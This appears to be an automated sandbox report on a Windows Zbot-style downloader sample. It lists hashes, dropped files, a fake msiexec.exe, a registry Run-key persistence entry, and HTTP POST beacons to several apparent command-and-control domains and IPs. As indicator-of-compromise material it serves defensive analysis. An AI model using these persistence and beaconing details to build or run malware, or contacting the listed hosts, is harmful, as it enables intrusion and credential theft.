Analysis Date: 2014-02-20 18:00:40
MD5: 085e59e1816a4089a05c67769d8c89d1
SHA1: 541c802b45b95db491db7c02fe50c54fa481c038

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: e98ce3d4b15fd44ea6f576f7c89fe050 sha1: eb1890579012bfd7d6dc6baeec0c757090af9c66 size: 199680
Section: .rdata md5: 3ce2e15f43435e0e98f21ff1ae26d8c5 sha1: 1fb7c6534e6e1973eb1124c242efd90e32a76728 size: 59904
Section: .data md5: 8180ba10727964551be51c93da36bd0b sha1: facf449fd401e1fd40e04eab77344ac7f0191bc7 size: 29696
Section: .reloc md5: 2bf797ee082907af362a63a4dfc73917 sha1: feee281ba3b0b7cb832f589b1c4fa1b50b9ca3a5 size: 8704
Section: glpoept md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Timestamp: 2004-07-07 00:10:50
Pdb path: d:\enter\Against\verb\my\stick\consonant\start\summerplease.pdb
Packer: Microsoft Visual C++ ?.?
PEhash: 51b1907df35bdd71dfad0b24033380359cdb5b29
IMPhash: dc30004d7554212a9764e7d3d60dbd50
AV avg: Downloader.Generic13.AMZR
AV avira: TR/Crypt.ZPACK.Gen
AV mcafee: PWSZbot-FDM!085E59E1816A

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\00E35EEE ➝ NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\ImageBase ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: PIPE\wkssvc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\01.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\MSI\msiexec.exe
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\01.tmp
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\MSI\msiexec.exe"

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\MSI\msiexec.exe"

Creates Process: C:\WINDOWS\system32\wuauclt.exe

Process
↳ C:\WINDOWS\system32\wuauclt.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝ C:\Documents and Settings\All Users\Local Settings\Temp\mspiinp.com\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden ➝ NULL
Registry: HKEY_CURRENT_USER\Software\IMAGE_FILE_HEADER ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\All Users\Local Settings\Temp\mspiinp.com
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\03.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\02.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\04.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\MSI\msiexec.exe
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: 3227095050
Creates Mutex: TLS
Winsock DNS: img.suckmycocklameavindustry.in
Winsock DNS: pe.suckmycocklameavindustry.in
Winsock DNS: sc.suckmycocklameavindustry.in

Network Details:

DNS: www.update.microsoft.com.nsatc.net, Type: A, 157.56.96.156
DNS: xdqzpbcgrvkj.ru, Type: A, 195.22.26.252
DNS: xdqzpbcgrvkj.ru, Type: A, 195.22.26.253
DNS: xdqzpbcgrvkj.ru, Type: A, 195.22.26.254
DNS: xdqzpbcgrvkj.ru, Type: A, 195.22.26.231
DNS: pe.suckmycocklameavindustry.in, Type: A, 50.116.32.177
DNS: sc.suckmycocklameavindustry.in, Type: A, 50.116.32.177
DNS: img.suckmycocklameavindustry.in, Type: A, 50.116.32.177
DNS: anam0rph.su, Type: A, 195.22.26.253
DNS: anam0rph.su, Type: A, 195.22.26.231
DNS: anam0rph.su, Type: A, 195.22.26.254
DNS: anam0rph.su, Type: A, 195.22.26.252
DNS: orzdwjtvmein.in, Type: A, 195.22.26.253
DNS: orzdwjtvmein.in, Type: A, 195.22.26.254
DNS: orzdwjtvmein.in, Type: A, 195.22.26.252
DNS: orzdwjtvmein.in, Type: A, 195.22.26.231
DNS: ygiudewsqhct.in, Type: A, 195.22.26.231
DNS: ygiudewsqhct.in, Type: A, 195.22.26.252
DNS: ygiudewsqhct.in, Type: A, 195.22.26.253
DNS: ygiudewsqhct.in, Type: A, 195.22.26.254
DNS: bdcrqgonzmwuehky.nl, Type: A, 195.22.26.253
DNS: bdcrqgonzmwuehky.nl, Type: A, 195.22.26.252
DNS: bdcrqgonzmwuehky.nl, Type: A, 195.22.26.254
DNS: bdcrqgonzmwuehky.nl, Type: A, 195.22.26.231
DNS: somicrososoft.ru, Type: A, 64.90.187.138
DNS: www.update.microsoft.com, Type: A
HTTP POST: http://xdqzpbcgrvkj.ru/in.php
User-Agent: Mozilla/4.0
HTTP GET: http://pe.suckmycocklameavindustry.in/rqyfmlsahgnucbipxvdkrqyfmlsahgnf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://sc.suckmycocklameavindustry.in/fmtsahonucjipxedkrzyfmtsahomkrpo
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://img.suckmycocklameavindustry.in/ucjipxedkrzyfmtsahonucjipxedbhgn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://anam0rph.su/in.php
User-Agent: Mozilla/4.0
HTTP POST: http://orzdwjtvmein.in/in.php
User-Agent: Mozilla/4.0
HTTP POST: http://ygiudewsqhct.in/in.php
User-Agent: Mozilla/4.0
HTTP POST: http://bdcrqgonzmwuehky.nl/in.php
User-Agent: Mozilla/4.0
HTTP POST: http://somicrososoft.ru/in.php
User-Agent: Mozilla/4.0
Flows TCP: 192.168.1.1:1031 ➝ 157.56.96.156:80
Flows UDP: 192.168.1.1:1032 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1034 ➝ 195.22.26.252:80
Flows UDP: 192.168.1.1:1035 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1036 ➝ 50.116.32.177:80
Flows TCP: 192.168.1.1:1037 ➝ 50.116.32.177:80
Flows TCP: 192.168.1.1:1038 ➝ 50.116.32.177:80
Flows TCP: 192.168.1.1:1039 ➝ 195.22.26.253:80
Flows UDP: 192.168.1.1:1040 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1041 ➝ 195.22.26.253:80
Flows UDP: 192.168.1.1:1042 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1043 ➝ 195.22.26.231:80
Flows UDP: 192.168.1.1:1044 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1045 ➝ 195.22.26.253:80
Flows UDP: 192.168.1.1:1046 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1047 ➝ 64.90.187.138:80

Raw Pcap


Strings